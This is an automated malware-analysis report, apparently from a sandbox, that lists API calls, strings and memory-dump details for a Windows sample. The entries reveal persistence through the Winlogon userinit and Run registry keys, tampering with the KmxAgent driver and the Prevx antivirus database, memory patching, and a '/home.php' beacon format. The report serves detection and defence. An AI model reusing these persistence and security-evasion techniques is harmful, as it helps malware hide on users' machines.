                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 02BB32C5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32C8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                            • String ID: %02X$%53%59%53%54%45%4D%21%38%39%39%35%35%32%21%46%32%41%41%36%45%43%33$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!899552!F2AA6EC3$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA376
                                                                                                                                                                                                            • GetThreadPriority.KERNEL32(00000000,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA37D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BCA386
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000040,?,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA3A7
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02BCA3C6
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02BCA3E2
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02BCA3F8
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02BCA406
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA411
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02BCA424
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02BCA435
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02BCA444
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02BCA453
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02BCA462
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000006,?), ref: 02BCA46A
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02BCA47D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02BCA48E
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02BCA49D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA4A9
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02BCA4B3
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4BB
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA4C2
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strstrstrtol
                                                                                                                                                                                                            • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BCA1CA
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BCA1D7
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02BCA1F4
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02BCA23E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCA256
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCA267
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02BCA279
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BCA291
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BCA2B1
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02BCA327
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCA334
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: %53%59%53%54%45%4D%21%38%39%39%35%35%32%21%46%32%41%41%36%45%43%33$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02BB33DE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • SystemDrive, xrefs: 02BB333F
                                                                                                                                                                                                            • C:\Windows\apppatch\svchost.exe, xrefs: 02BB33B4, 02BB33EB
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 02BB33D4
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02BB339D
                                                                                                                                                                                                            • userinit, xrefs: 02BB33F6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB75A8
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB75AF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB75CF
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 02BB75E0
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB75F0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,76F8F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02BB738D
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BB73B4
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02BB73D5
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BB73EE
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BB73F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000), ref: 02BB740C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB741B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB742D
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB743D
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 02BB744A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB746C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB747D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$CloseCurrentHandleOpenProcessThread$AdjustChangeConvertCreateErrorFindFreeInfoInformationLastLocalLockLookupNamedNotificationPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                            • userinit, xrefs: 00402A38
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 1233480013-2375045364
                                                                                                                                                                                                            • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56B7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 02BD572A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 02BD574C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 02BD5758
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 02BD5766
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                            • Instruction ID: f3bfd1e9bc7a1451e5ffc3dee36508268ad7b8ab5e19761d113258a3d9e04498
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21AB36941114ABD7709BA8AC48FDE77BCEB45364F9402D5EA05D3180FB30DE5587A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-2086362228
                                                                                                                                                                                                            • Opcode ID: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                            • Instruction ID: 3c7f919c13970d223deefaf38efdb687625a569ec523427cd7b716c3292c661e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A319671E412286AEB26DB659C49BEE7B7CEF04704F4005D9EA49E7140D7F05E848BE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6B41
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6B5F
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02BB6B7A
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000001,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6BA1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
